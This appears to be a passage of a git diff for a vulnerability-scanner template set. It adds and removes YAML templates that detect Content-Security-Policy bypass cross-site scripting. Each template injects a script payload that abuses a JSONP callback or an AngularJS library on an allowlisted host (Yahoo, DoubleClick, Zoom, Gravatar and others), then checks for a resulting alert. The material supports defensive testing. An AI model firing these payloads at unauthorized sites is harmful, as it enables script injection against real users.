+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: s_ytimg_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "s_ytimg_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
new file mode 100644
index 00000000000..ea79c71aadc
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: search-yahoo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yahoo Search
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yahoo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback=confirm"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: search_yahoo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "search_yahoo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
new file mode 100644
index 00000000000..852f6816740
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-adnxs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Secure Adnxs
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,adnxs
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://secure.adnxs.com/getuidp?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: secure_adnxs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "secure_adnxs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
new file mode 100644
index 00000000000..471ca9e670f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-gravatar-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Secure Gravatar
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gravatar
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://secure.gravatar.com/930fc2e7cd239606c398bff5b5fc12e7.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: secure_gravatar_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "secure_gravatar_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..dc5b9781ef5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-quantserve-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Secure Quantserve
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,quantserve
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://secure.quantserve.com/api/segments.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: secure_quantserve_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "secure_quantserve_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
new file mode 100644
index 00000000000..55cb72cfac3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: securepubads-doubleclick-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Secure DoubleClick PubAds
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,doubleclick
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://securepubads.g.doubleclick.net/gampad/ads?gdfp_req=1&output=json_html&iu=%2F32173961%2Fdesktop%2Ffrontpage%2Flisting&sz=300x250&url=https%3A%2F%2Fwww.reddit.com%2F&vrg=147&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: securepubads_doubleclick_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "securepubads_doubleclick_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..8b0b3c98ce3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: segapi-quantserve-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via SegAPI Quantserve
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,quantserve
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://segapi.quantserve.com/api/segments.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: segapi_quantserve_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "segapi_quantserve_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
new file mode 100644
index 00000000000..c2e769b64b1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: server-ethicalads-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via EthicalAds Server
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ethicalads
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://server.ethicalads.io/api/v1/decision/?publisher=jsbin&ad_types=x&format=jsonp&div_ids=x&callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: server_ethicalads_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "server_ethicalads_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml b/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
deleted file mode 100644
index 8263d6499f7..00000000000
--- a/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: servicenow-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via ServiceNow
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L101C25-L101C234
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,servicenow
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - <body ng-app ng-csp><script src="https://kbcprod.service-now.com/scripts/angular_includes_1.5.11.jsx"></script><input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'"></body>
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "service-now.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
new file mode 100644
index 00000000000..eb8c6ae1ad1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: shop-samsung-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Samsung Shop
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,samsung
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://shop.samsung.com/br/_v/private/ng/p4v1/getCartCount?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: shop_samsung_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "shop_samsung_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
new file mode 100644
index 00000000000..008ab5fb3d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
@@ -0,0 +1,57 @@
+id: skype-config-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Skype Config
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,skype
+
+#flow: http() && headless()
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://config.skype.com/config/v1/1?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: skype_config_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "skype_config_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
new file mode 100644
index 00000000000..b8d7e8efb06
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: smartcaptcha-yandexcloud-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via YandexCloud SmartCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yandexcloud
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://smartcaptcha.yandexcloud.net/captcha.js?render=onload&onload=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: smartcaptcha_yandexcloud_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "smartcaptcha_yandexcloud_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..5dcfe7ac37c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: social-yandex-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yandex Social
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yandex
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://social.yandex.ru/providers.jsonp?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: social_yandex_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "social_yandex_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
deleted file mode 100644
index 930b2ad6d13..00000000000
--- a/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: sogou-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Sogou
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,sogou
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://zhuanjia.sogou.com/base/ajax/login/login-init?callback=alert(1)-"></script>'
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "sogou.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
new file mode 100644
index 00000000000..1ccebf63711
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: soundcloud-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via SoundCloud
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,soundcloud
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://soundcloud.com/oembed?format=js&callback=alert&url=https://soundcloud.com/rich-the-kid/plug-walk-1"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: soundcloud_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "soundcloud_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
new file mode 100644
index 00000000000..2a16a5ae548
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: srv-carbonads-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via CarbonAds
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,carbonads
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://srv.carbonads.net/ads/x.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: srv_carbonads_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "srv_carbonads_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
new file mode 100644
index 00000000000..89cb1f2fb01
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ssl-gstatic-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Gstatic SSL
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gstatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="//ssl.gstatic.com/fsn/angular_js-bundle1.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ssl_gstatic_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ssl_gstatic_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
new file mode 100644
index 00000000000..4f9cc6338c9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sso-bytedance-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via ByteDance SSO
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bytedance
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://sso.bytedance.com/watermark/?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: sso_bytedance_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "sso_bytedance_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
new file mode 100644
index 00000000000..444ee9ab8d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: st3-zoom-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Zoom ST3
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,zoom
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://st3.zoom.us/static/6.2.7600/js/lib/angular.min.js"></script><div ng-app><input autofocus ng-focus="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: st3_zoom_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "st3_zoom_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
new file mode 100644
index 00000000000..805ef3c0e34
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: stackexchange-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via StackExchange API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,stackexchange
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.stackexchange.com/2.2/me?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: stackexchange_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "stackexchange_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
new file mode 100644
index 00000000000..8a0729fae8d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: static-parastorage-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Parastorage Static
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,parastorage
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://static.parastorage.com/services/third-party/angularjs/1.4.5/angular.min.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: static_parastorage_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "static_parastorage_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..7f9571d8376
--- /dev/null
